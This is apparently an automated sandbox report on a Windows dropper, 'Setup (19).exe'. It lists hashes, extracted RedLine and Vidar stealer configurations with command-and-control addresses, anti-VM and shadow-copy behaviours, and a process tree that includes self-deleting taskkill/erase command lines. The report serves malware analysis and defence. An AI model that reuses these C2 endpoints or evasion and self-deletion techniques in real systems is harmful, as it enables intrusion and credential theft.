Overview
overview
10Static
static
Setup (1).exe
windows10_x64
10Setup (10).exe
windows10_x64
10Setup (11).exe
windows10_x64
10Setup (12).exe
windows10_x64
10Setup (13).exe
windows10_x64
10Setup (14).exe
windows10_x64
10Setup (15).exe
windows10_x64
10Setup (16).exe
windows10_x64
10Setup (17).exe
windows10_x64
10Setup (18).exe
windows10_x64
10Setup (19).exe
windows10_x64
10Setup (2).exe
windows10_x64
10Setup (20).exe
windows10_x64
10Setup (21).exe
windows10_x64
10Setup (22).exe
windows10_x64
10Setup (23).exe
windows10_x64
10Setup (24).exe
windows10_x64
10Setup (25).exe
windows10_x64
10Setup (26).exe
windows10_x64
10Setup (27).exe
windows10_x64
10Setup (28).exe
windows10_x64
10Setup (29).exe
windows10_x64
10Setup (3).exe
windows10_x64
10Setup (30).exe
windows10_x64
10Setup (31).exe
windows10_x64
10Setup (4).exe
windows10_x64
10Setup (5).exe
windows10_x64
10Setup (6).exe
windows10_x64
10Setup (7).exe
windows10_x64
10Setup (8).exe
windows10_x64
10Setup (9).exe
windows10_x64
10Setup.exe
windows10_x64
10Resubmissions
15/10/2024, 15:36
241015-s1zlzasdkc 1001/07/2024, 18:32
240701-w6yteawhmq 1001/07/2024, 14:52
240701-r82wmaxdnd 1001/07/2024, 14:52
240701-r8syqa1dpp 1011/03/2024, 21:22
240311-z8dsssgg58 1001/09/2021, 13:18
210901-5bmxjspa5s 1001/09/2021, 13:04
210901-te4btfspqa 1001/09/2021, 05:12
210901-4wnkwm1p3j 1031/08/2021, 21:47
210831-41rp97dma2 10Analysis
-
max time kernel
155s -
max time network
1811s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
24/08/2021, 20:54
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win10v20210410
Behavioral task
behavioral2
Sample
Setup (10).exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
Setup (11).exe
Resource
win10v20210408
Behavioral task
behavioral4
Sample
Setup (12).exe
Resource
win10v20210410
Behavioral task
behavioral5
Sample
Setup (13).exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
Setup (14).exe
Resource
win10v20210410
Behavioral task
behavioral7
Sample
Setup (15).exe
Resource
win10v20210410
Behavioral task
behavioral8
Sample
Setup (16).exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
Setup (17).exe
Resource
win10v20210410
Behavioral task
behavioral10
Sample
Setup (18).exe
Resource
win10v20210408
Behavioral task
behavioral11
Sample
Setup (19).exe
Resource
win10v20210410
Behavioral task
behavioral12
Sample
Setup (2).exe
Resource
win10v20210408
Behavioral task
behavioral13
Sample
Setup (20).exe
Resource
win10v20210410
Behavioral task
behavioral14
Sample
Setup (21).exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
Setup (22).exe
Resource
win10v20210408
Behavioral task
behavioral16
Sample
Setup (23).exe
Resource
win10v20210410
Behavioral task
behavioral17
Sample
Setup (24).exe
Resource
win10v20210408
Behavioral task
behavioral18
Sample
Setup (25).exe
Resource
win10v20210410
Behavioral task
behavioral19
Sample
Setup (26).exe
Resource
win10v20210408
Behavioral task
behavioral20
Sample
Setup (27).exe
Resource
win10v20210410
Behavioral task
behavioral21
Sample
Setup (28).exe
Resource
win10v20210410
Behavioral task
behavioral22
Sample
Setup (29).exe
Resource
win10v20210408
Behavioral task
behavioral23
Sample
Setup (3).exe
Resource
win10v20210410
Behavioral task
behavioral24
Sample
Setup (30).exe
Resource
win10v20210408
Behavioral task
behavioral25
Sample
Setup (31).exe
Resource
win10v20210410
Behavioral task
behavioral26
Sample
Setup (4).exe
Resource
win10v20210408
Behavioral task
behavioral27
Sample
Setup (5).exe
Resource
win10v20210410
Behavioral task
behavioral28
Sample
Setup (6).exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
Setup (7).exe
Resource
win10v20210408
Behavioral task
behavioral30
Sample
Setup (8).exe
Resource
win10v20210410
Behavioral task
behavioral31
Sample
Setup (9).exe
Resource
win10v20210408
Behavioral task
behavioral32
Sample
Setup.exe
Resource
win10v20210410
General
-
Target
Setup (19).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
redline
supertraff
135.148.139.222:1494
Extracted
redline
dibild2
135.148.139.222:1494
Extracted
redline
24.08
95.181.172.100:55640
Extracted
vidar
40.1
937
https://eduarroma.tumblr.com/
-
profile_id
937
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3352 2384 rundll32.exe 130 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4284 2384 rundll32.exe 130 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7456 2384 rundll32.exe 130 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5944 2384 rundll32.exe 130 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
resource yara_rule behavioral11/files/0x000100000001ab94-142.dat family_redline behavioral11/files/0x000100000001ab94-186.dat family_redline behavioral11/memory/4940-291-0x000000000041A616-mapping.dmp family_redline behavioral11/memory/4940-284-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral11/memory/5020-300-0x000000000041A76A-mapping.dmp family_redline behavioral11/memory/5020-296-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral11/memory/3148-397-0x0000000000400000-0x0000000002D1A000-memory.dmp family_vidar -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 32 IoCs
pid Process 3188 PMYOcQY_sK9WgaNnRHrGhfrV.exe 4024 TsYrvSvl_8Fg7XvPJfjVRBqk.exe 1292 A2AFe8yxnoM0pAQFO_osbdcb.exe 3896 zhaoy-game.exe 1608 8d_QkOtj1vJIPjPRfTvlMoul.exe 3912 QSjWABEot8afUaYKHNsOeMFK.exe 2828 AqimP5TcIJBATtCB_skmDWBM.exe 2568 jaMb6qv8jKSPzTumizrvUr0t.exe 3404 Cd1_GhEkf6r5VyvSPccXa4pd.exe 2848 OUCxGDOmocchEqru9lIGqpec.exe 2588 L8_6iMKvWrCjH_BrTSZNnsZ8.exe 3148 OSYFcbCgdceAZQixUtJi8Tlm.exe 2144 ultramediaburner.exe 2608 iOrJgzXZAN9GxViKD5epKQa9.exe 2092 APG9Y7QLV0Wv4wkaMpjWjH5O.exe 2328 Fs0ALYADNu4GdeLmIDEafYql.exe 1832 gXDSBbnv0dqtpT7VRWOBQ6Wx.exe 3220 AreuMkSthZVjdQsQv4v_hsUd.exe 3908 vMrvfTC40fz0wJQSNnEb1vlj.exe 3944 yuOMwcQFh1wquc52IaH03wkF.exe 196 iKBIlyzjFEyxcJCFAThmZJNH.exe 2384 wmiprvse.exe 3248 DtfrI6pZuuWUoC6RfUcrXtwA.exe 4324 customer3.exe 4376 md8_8eus.exe 4392 gEga2cgo4qNeMiHj3tT00poP.exe 4436 jooyu.exe 4644 gEga2cgo4qNeMiHj3tT00poP.tmp 5112 DtfrI6pZuuWUoC6RfUcrXtwA.exe 4940 QSjWABEot8afUaYKHNsOeMFK.exe 5020 Y2SB33o6zbn4ANHc4ULNYw_s.exe 4292 WO~L~OYJWS8EVL1.eXe -
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion APG9Y7QLV0Wv4wkaMpjWjH5O.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion gXDSBbnv0dqtpT7VRWOBQ6Wx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion gXDSBbnv0dqtpT7VRWOBQ6Wx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion L8_6iMKvWrCjH_BrTSZNnsZ8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion L8_6iMKvWrCjH_BrTSZNnsZ8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion OUCxGDOmocchEqru9lIGqpec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion OUCxGDOmocchEqru9lIGqpec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion APG9Y7QLV0Wv4wkaMpjWjH5O.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Setup (19).exe -
Loads dropped DLL 3 IoCs
pid Process 4024 TsYrvSvl_8Fg7XvPJfjVRBqk.exe 4644 gEga2cgo4qNeMiHj3tT00poP.tmp 4644 gEga2cgo4qNeMiHj3tT00poP.tmp -
resource yara_rule behavioral11/files/0x000100000001aba3-163.dat themida behavioral11/files/0x000100000001ab92-188.dat themida behavioral11/files/0x000100000001ab9f-192.dat themida behavioral11/files/0x000100000001aba3-187.dat themida behavioral11/files/0x000100000001ab98-184.dat themida behavioral11/memory/2092-250-0x0000000001140000-0x0000000001141000-memory.dmp themida behavioral11/memory/1832-256-0x00000000002C0000-0x00000000002C1000-memory.dmp themida behavioral11/memory/2848-251-0x0000000000F70000-0x0000000000F71000-memory.dmp themida behavioral11/memory/2588-249-0x00000000011E0000-0x00000000011E1000-memory.dmp themida behavioral11/files/0x000100000001ab9f-159.dat themida behavioral11/files/0x000100000001ab92-151.dat themida behavioral11/files/0x000100000001ab98-152.dat themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA OUCxGDOmocchEqru9lIGqpec.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA L8_6iMKvWrCjH_BrTSZNnsZ8.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA gXDSBbnv0dqtpT7VRWOBQ6Wx.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA APG9Y7QLV0Wv4wkaMpjWjH5O.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 20 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 599 freegeoip.app 230 freegeoip.app 533 geoiptool.com 410 ipinfo.io 413 ipinfo.io 30 ipinfo.io 236 ipinfo.io 406 ip-api.com 598 freegeoip.app 224 freegeoip.app 237 ipinfo.io 149 ipinfo.io 155 ip-api.com 226 freegeoip.app 227 freegeoip.app 231 ipinfo.io 238 ipinfo.io 29 ipinfo.io 145 ipinfo.io 243 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 2588 L8_6iMKvWrCjH_BrTSZNnsZ8.exe 2848 OUCxGDOmocchEqru9lIGqpec.exe 2092 APG9Y7QLV0Wv4wkaMpjWjH5O.exe 1832 gXDSBbnv0dqtpT7VRWOBQ6Wx.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3912 set thread context of 4940 3912 QSjWABEot8afUaYKHNsOeMFK.exe 127 PID 2828 set thread context of 5020 2828 AqimP5TcIJBATtCB_skmDWBM.exe 114 -
Drops file in Program Files directory 5 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe wmiprvse.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe wmiprvse.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe wmiprvse.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe wmiprvse.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini wmiprvse.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 31 IoCs
pid pid_target Process procid_target 3552 4940 WerFault.exe 5048 196 WerFault.exe 105 4240 196 WerFault.exe 105 4020 196 WerFault.exe 105 4032 196 WerFault.exe 105 5596 2608 WerFault.exe 95 5652 196 WerFault.exe 105 5948 196 WerFault.exe 105 6060 3148 WerFault.exe 92 5932 3148 WerFault.exe 92 4372 3148 WerFault.exe 92 5280 3148 WerFault.exe 92 5320 3148 WerFault.exe 92 5280 3148 WerFault.exe 92 2116 3148 WerFault.exe 92 2116 3908 WerFault.exe 107 6288 6024 WerFault.exe 145 6640 6024 WerFault.exe 145 6856 6024 WerFault.exe 145 7164 6024 WerFault.exe 145 6488 6024 WerFault.exe 145 4648 6024 WerFault.exe 145 6908 6024 WerFault.exe 145 7388 6024 WerFault.exe 145 8056 6024 WerFault.exe 145 6536 6024 WerFault.exe 145 7364 7192 WerFault.exe 229 8116 7192 WerFault.exe 229 796 7192 WerFault.exe 229 7616 7192 WerFault.exe 229 6172 7236 WerFault.exe 230 -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6184 schtasks.exe 2940 schtasks.exe 9836 schtasks.exe 4140 schtasks.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 9812 vssadmin.exe 10320 vssadmin.exe -
Kills process with taskkill 8 IoCs
pid Process 4428 taskkill.exe 7408 taskkill.exe 4556 taskkill.exe 2804 taskkill.exe 6932 taskkill.exe 6892 taskkill.exe 5868 taskkill.exe 9100 taskkill.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 5100 PING.EXE 7220 PING.EXE 8768 PING.EXE -
Script User-Agent 7 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 417 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 148 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 160 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 232 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 233 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 234 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 411 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 3980 Setup (19).exe 3980 Setup (19).exe 3552 WerFault.exe 3552 WerFault.exe 3552 WerFault.exe 3552 WerFault.exe 3552 WerFault.exe 3552 WerFault.exe 3552 WerFault.exe 3552 WerFault.exe 3552 WerFault.exe 3552 WerFault.exe 3552 WerFault.exe 3552 WerFault.exe 3552 WerFault.exe 3552 WerFault.exe 3552 WerFault.exe 3552 WerFault.exe 3552 WerFault.exe 3552 WerFault.exe 3552 WerFault.exe 5048 Process not Found 5048 Process not Found 5048 Process not Found 5048 Process not Found 5048 Process not Found 5048 Process not Found 5048 Process not Found 5048 Process not Found 5048 Process not Found 5048 Process not Found 5048 Process not Found 5048 Process not Found 5048 Process not Found 5048 Process not Found 5048 Process not Found 5048 Process not Found 5048 Process not Found 5048 Process not Found 5048 Process not Found -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 4024 TsYrvSvl_8Fg7XvPJfjVRBqk.exe Token: SeDebugPrivilege 3404 Cd1_GhEkf6r5VyvSPccXa4pd.exe Token: SeDebugPrivilege 3896 zhaoy-game.exe Token: SeRestorePrivilege 3552 WerFault.exe Token: SeBackupPrivilege 3552 WerFault.exe Token: SeDebugPrivilege 3552 WerFault.exe Token: SeDebugPrivilege 5048 Process not Found -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4644 gEga2cgo4qNeMiHj3tT00poP.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3980 wrote to memory of 3188 3980 Setup (19).exe 80 PID 3980 wrote to memory of 3188 3980 Setup (19).exe 80 PID 3980 wrote to memory of 3188 3980 Setup (19).exe 80 PID 3980 wrote to memory of 4024 3980 Setup (19).exe 79 PID 3980 wrote to memory of 4024 3980 Setup (19).exe 79 PID 3980 wrote to memory of 1292 3980 Setup (19).exe 81 PID 3980 wrote to memory of 1292 3980 Setup (19).exe 81 PID 3980 wrote to memory of 3896 3980 Setup (19).exe 82 PID 3980 wrote to memory of 3896 3980 Setup (19).exe 82 PID 3980 wrote to memory of 1608 3980 Setup (19).exe 83 PID 3980 wrote to memory of 1608 3980 Setup (19).exe 83 PID 3980 wrote to memory of 1608 3980 Setup (19).exe 83 PID 3980 wrote to memory of 2828 3980 Setup (19).exe 87 PID 3980 wrote to memory of 2828 3980 Setup (19).exe 87 PID 3980 wrote to memory of 2828 3980 Setup (19).exe 87 PID 3980 wrote to memory of 3912 3980 Setup (19).exe 84 PID 3980 wrote to memory of 3912 3980 Setup (19).exe 84 PID 3980 wrote to memory of 3912 3980 Setup (19).exe 84 PID 3980 wrote to memory of 2568 3980 Setup (19).exe 96 PID 3980 wrote to memory of 2568 3980 Setup (19).exe 96 PID 3980 wrote to memory of 2568 3980 Setup (19).exe 96 PID 3980 wrote to memory of 3404 3980 Setup (19).exe 86 PID 3980 wrote to memory of 3404 3980 Setup (19).exe 86 PID 3980 wrote to memory of 3404 3980 Setup (19).exe 86 PID 3980 wrote to memory of 2588 3980 Setup (19).exe 94 PID 3980 wrote to memory of 2588 3980 Setup (19).exe 94 PID 3980 wrote to memory of 2588 3980 Setup (19).exe 94 PID 3980 wrote to memory of 2848 3980 Setup (19).exe 93 PID 3980 wrote to memory of 2848 3980 Setup (19).exe 93 PID 3980 wrote to memory of 2848 3980 Setup (19).exe 93 PID 3980 wrote to memory of 2608 3980 Setup (19).exe 95 PID 3980 wrote to memory of 2608 3980 Setup (19).exe 95 PID 3980 wrote to memory of 2608 3980 Setup (19).exe 95 PID 3980 wrote to memory of 3148 3980 Setup (19).exe 92 PID 3980 wrote to memory of 3148 3980 Setup (19).exe 92 PID 3980 wrote to memory of 3148 3980 Setup (19).exe 92 PID 3980 wrote to memory of 2144 3980 Setup (19).exe 85 PID 3980 wrote to memory of 2144 3980 Setup (19).exe 85 PID 3980 wrote to memory of 2144 3980 Setup (19).exe 85 PID 3980 wrote to memory of 2092 3980 Setup (19).exe 91 PID 3980 wrote to memory of 2092 3980 Setup (19).exe 91 PID 3980 wrote to memory of 2092 3980 Setup (19).exe 91 PID 3980 wrote to memory of 2328 3980 Setup (19).exe 90 PID 3980 wrote to memory of 2328 3980 Setup (19).exe 90 PID 3980 wrote to memory of 2328 3980 Setup (19).exe 90 PID 3980 wrote to memory of 1832 3980 Setup (19).exe 89 PID 3980 wrote to memory of 1832 3980 Setup (19).exe 89 PID 3980 wrote to memory of 1832 3980 Setup (19).exe 89 PID 3980 wrote to memory of 3220 3980 Setup (19).exe 88 PID 3980 wrote to memory of 3220 3980 Setup (19).exe 88 PID 3980 wrote to memory of 3220 3980 Setup (19).exe 88 PID 3980 wrote to memory of 3944 3980 Setup (19).exe 108 PID 3980 wrote to memory of 3944 3980 Setup (19).exe 108 PID 3980 wrote to memory of 3944 3980 Setup (19).exe 108 PID 3980 wrote to memory of 3908 3980 Setup (19).exe 107 PID 3980 wrote to memory of 3908 3980 Setup (19).exe 107 PID 3980 wrote to memory of 3908 3980 Setup (19).exe 107 PID 3980 wrote to memory of 196 3980 Setup (19).exe 105 PID 3980 wrote to memory of 196 3980 Setup (19).exe 105 PID 3980 wrote to memory of 196 3980 Setup (19).exe 105 PID 3980 wrote to memory of 2384 3980 Setup (19).exe 130 PID 3980 wrote to memory of 2384 3980 Setup (19).exe 130 PID 3980 wrote to memory of 2384 3980 Setup (19).exe 130 PID 3980 wrote to memory of 3248 3980 Setup (19).exe 197
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (19).exe"C:\Users\Admin\AppData\Local\Temp\Setup (19).exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Users\Admin\Documents\TsYrvSvl_8Fg7XvPJfjVRBqk.exe"C:\Users\Admin\Documents\TsYrvSvl_8Fg7XvPJfjVRBqk.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
-
C:\Users\Admin\Documents\PMYOcQY_sK9WgaNnRHrGhfrV.exe"C:\Users\Admin\Documents\PMYOcQY_sK9WgaNnRHrGhfrV.exe"2⤵
- Executes dropped EXE
PID:3188 -
C:\Users\Admin\Documents\PMYOcQY_sK9WgaNnRHrGhfrV.exe"C:\Users\Admin\Documents\PMYOcQY_sK9WgaNnRHrGhfrV.exe"3⤵PID:5368
-
-
-
C:\Users\Admin\Documents\A2AFe8yxnoM0pAQFO_osbdcb.exe"C:\Users\Admin\Documents\A2AFe8yxnoM0pAQFO_osbdcb.exe"2⤵
- Executes dropped EXE
PID:1292
-
-
C:\Users\Admin\Documents\HBOyOhd25JvX0sqL7MBdiEtp.exe"C:\Users\Admin\Documents\HBOyOhd25JvX0sqL7MBdiEtp.exe"2⤵PID:3896
-
C:\Users\Admin\AppData\Roaming\8165956.exe"C:\Users\Admin\AppData\Roaming\8165956.exe"3⤵PID:1664
-
-
C:\Users\Admin\AppData\Roaming\1841423.exe"C:\Users\Admin\AppData\Roaming\1841423.exe"3⤵PID:4804
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵PID:5552
-
-
-
C:\Users\Admin\AppData\Roaming\3682459.exe"C:\Users\Admin\AppData\Roaming\3682459.exe"3⤵PID:356
-
-
C:\Users\Admin\AppData\Roaming\7363904.exe"C:\Users\Admin\AppData\Roaming\7363904.exe"3⤵PID:4840
-
-
-
C:\Users\Admin\Documents\8d_QkOtj1vJIPjPRfTvlMoul.exe"C:\Users\Admin\Documents\8d_QkOtj1vJIPjPRfTvlMoul.exe"2⤵
- Executes dropped EXE
PID:1608
-
-
C:\Users\Admin\Documents\QSjWABEot8afUaYKHNsOeMFK.exe"C:\Users\Admin\Documents\QSjWABEot8afUaYKHNsOeMFK.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3912 -
C:\Users\Admin\Documents\QSjWABEot8afUaYKHNsOeMFK.exeC:\Users\Admin\Documents\QSjWABEot8afUaYKHNsOeMFK.exe3⤵
- Executes dropped EXE
PID:4940
-
-
-
C:\Users\Admin\Documents\3qJtxoADt5Bwhn7DiMi9yasB.exe"C:\Users\Admin\Documents\3qJtxoADt5Bwhn7DiMi9yasB.exe"2⤵PID:2144
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\2712680622.exe"3⤵PID:5432
-
C:\Users\Admin\AppData\Local\Temp\2712680622.exe"C:\Users\Admin\AppData\Local\Temp\2712680622.exe"4⤵PID:2864
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "3qJtxoADt5Bwhn7DiMi9yasB.exe" /f & erase "C:\Users\Admin\Documents\3qJtxoADt5Bwhn7DiMi9yasB.exe" & exit3⤵PID:7724
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "3qJtxoADt5Bwhn7DiMi9yasB.exe" /f4⤵
- Kills process with taskkill
PID:6932
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1283369345.exe"3⤵PID:7180
-
C:\Users\Admin\AppData\Local\Temp\1283369345.exe"C:\Users\Admin\AppData\Local\Temp\1283369345.exe"4⤵PID:6548
-
-
-
-
C:\Users\Admin\Documents\Cd1_GhEkf6r5VyvSPccXa4pd.exe"C:\Users\Admin\Documents\Cd1_GhEkf6r5VyvSPccXa4pd.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3404 -
C:\Users\Admin\Documents\Cd1_GhEkf6r5VyvSPccXa4pd.exe"C:\Users\Admin\Documents\Cd1_GhEkf6r5VyvSPccXa4pd.exe"3⤵PID:4712
-
-
-
C:\Users\Admin\Documents\Y2SB33o6zbn4ANHc4ULNYw_s.exe"C:\Users\Admin\Documents\Y2SB33o6zbn4ANHc4ULNYw_s.exe"2⤵PID:2828
-
C:\Users\Admin\Documents\Y2SB33o6zbn4ANHc4ULNYw_s.exeC:\Users\Admin\Documents\Y2SB33o6zbn4ANHc4ULNYw_s.exe3⤵
- Executes dropped EXE
PID:5020
-
-
-
C:\Users\Admin\Documents\AreuMkSthZVjdQsQv4v_hsUd.exe"C:\Users\Admin\Documents\AreuMkSthZVjdQsQv4v_hsUd.exe"2⤵
- Executes dropped EXE
PID:3220
-
-
C:\Users\Admin\Documents\gXDSBbnv0dqtpT7VRWOBQ6Wx.exe"C:\Users\Admin\Documents\gXDSBbnv0dqtpT7VRWOBQ6Wx.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1832
-
-
C:\Users\Admin\Documents\Fs0ALYADNu4GdeLmIDEafYql.exe"C:\Users\Admin\Documents\Fs0ALYADNu4GdeLmIDEafYql.exe"2⤵
- Executes dropped EXE
PID:2328 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Fs0ALYADNu4GdeLmIDEafYql.exe" /f & erase "C:\Users\Admin\Documents\Fs0ALYADNu4GdeLmIDEafYql.exe" & exit3⤵PID:2200
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Fs0ALYADNu4GdeLmIDEafYql.exe" /f4⤵
- Kills process with taskkill
PID:2804
-
-
-
-
C:\Users\Admin\Documents\APG9Y7QLV0Wv4wkaMpjWjH5O.exe"C:\Users\Admin\Documents\APG9Y7QLV0Wv4wkaMpjWjH5O.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2092
-
-
C:\Users\Admin\Documents\HQGFXLLjwG5SufKxgwvNcyK5.exe"C:\Users\Admin\Documents\HQGFXLLjwG5SufKxgwvNcyK5.exe"2⤵PID:3148
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 7603⤵
- Program crash
PID:6060
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 8203⤵
- Program crash
PID:5932
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 7843⤵
- Program crash
PID:4372
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 8003⤵
- Program crash
PID:5280
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 9563⤵
- Program crash
PID:5320
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 9843⤵
- Program crash
PID:5280
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 10163⤵
- Program crash
PID:2116
-
-
-
C:\Users\Admin\Documents\OUCxGDOmocchEqru9lIGqpec.exe"C:\Users\Admin\Documents\OUCxGDOmocchEqru9lIGqpec.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2848
-
-
C:\Users\Admin\Documents\L8_6iMKvWrCjH_BrTSZNnsZ8.exe"C:\Users\Admin\Documents\L8_6iMKvWrCjH_BrTSZNnsZ8.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2588
-
-
C:\Users\Admin\Documents\iOrJgzXZAN9GxViKD5epKQa9.exe"C:\Users\Admin\Documents\iOrJgzXZAN9GxViKD5epKQa9.exe"2⤵
- Executes dropped EXE
PID:2608 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 4803⤵
- Program crash
PID:5596
-
-
-
C:\Users\Admin\Documents\jaMb6qv8jKSPzTumizrvUr0t.exe"C:\Users\Admin\Documents\jaMb6qv8jKSPzTumizrvUr0t.exe"2⤵
- Executes dropped EXE
PID:2568
-
-
